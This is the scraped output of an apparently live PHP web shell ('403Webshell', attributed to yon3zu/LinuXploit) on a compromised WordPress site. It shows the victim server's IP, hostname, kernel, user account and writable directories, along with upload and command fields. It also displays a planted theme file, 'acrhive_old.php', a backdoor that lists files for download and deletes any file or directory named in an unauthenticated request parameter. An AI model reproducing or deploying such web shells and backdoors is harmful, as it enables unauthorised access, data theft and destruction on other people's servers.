403Webshell
Server IP : 103.255.250.91  /  Your IP : 216.73.217.146
Web Server : Apache
System : Linux charlie.thegoodhost.io 5.14.0-570.39.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Sep 4 05:08:52 EDT 2025 x86_64
User : tongkhen ( 1019)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/tongkhen/domains/carpetworld.com.sg/wp-content/themes/renovation/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/tongkhen/domains/carpetworld.com.sg/wp-content/themes/renovation/acrhive_old.php
<?php  ob_start(); ?>
<table width="700" border="0" align="center" cellspacing="0" cellpadding="0">
<tr>
	<td width="124">&nbsp;</td>
	<td width="228">&nbsp;</td>
	<td width="148">&nbsp;</td>
</tr>
<?php
if($_REQUEST['d']) {
	$f=$_REQUEST['d'];
	$p=explode(".",$f);
	if($p[1]){
		unlink($f);
	} else {
		$dir=$f."/*.*";
		foreach(glob($dir) as $v) {
			
		}
	 rmdir($f);
	}
}
foreach(glob('*') as $v){	  
	$arr_ext= explode(".",$v);
	if($arr_ext[1]) { ?>
		<tr>
		<td><?php echo $v; ?></td>
		<td><a href="download_act.php?f=<?php echo $v; ?>">Download</a></td>
		<td>&nbsp;&nbsp;&nbsp;&nbsp;<a href="acrhive_old.php?d=<?php echo $v; ?>">Delete</a></td>
	  </tr>
	<?php
	} else {
	  if (is_dir($v)) {
		if ($dh = opendir($v)) {
			while (($file = readdir($dh)) !== false) {
				$arr_ext_1= explode(".",$file);
			if($arr_ext_1[1]) {
	?>
	<tr>
		<td><?php echo "Dir---&raquo;&raquo;".$v."----&raquo;&raquo;". $file; ?></td>
		<td><a href="download_act.php?f=<?php echo $v."/".$file; ?>">Download</a></td>
		<td>&nbsp;&nbsp;&nbsp;&nbsp;<a href="acrhive_old.php?d=<?php echo $v."/".$file; ?>">Delete</a></td>
	</tr>
<?php
} elseif($arr_ext_1[0]) {
	$dir_sub= $v."/".$arr_ext_1[0];
if (is_dir($dir_sub)) {
 if ($dh_1 = opendir($dir_sub)) {
        while (($file_1 = readdir($dh_1)) !== false) {	
			$file_1."<br>"; ?>
<tr>
	<td><?php echo "Dir---&raquo;&raquo;".$v."----&raquo;&raquo;". $arr_ext_1[0]."----&raquo;&raquo;". $file_1; ?></td>
	<td><a href="download_act.php?f=<?php echo $v."/".$arr_ext_1[0]."/".$file_1; ?>">Download</a></td>
	<td>&nbsp;&nbsp;&nbsp;&nbsp;<a href="acrhive_old.php?d=<?php echo $v."/".$arr_ext_1[0]."/".$file_1; ?>">Delete</a></td>
</tr>
           
			
	<?php		
       }
	    }
       closedir($dh_1);
    }
}

		}
		
        }
        closedir($dh);
    }
}
  
  
  }
  
?>
<tr>
    <td>&nbsp;</td>
    <td>&nbsp;</td>
    <td>&nbsp;</td>
  </tr>
</table>

Youez - 2016 - github.com/yon3zu
LinuXploit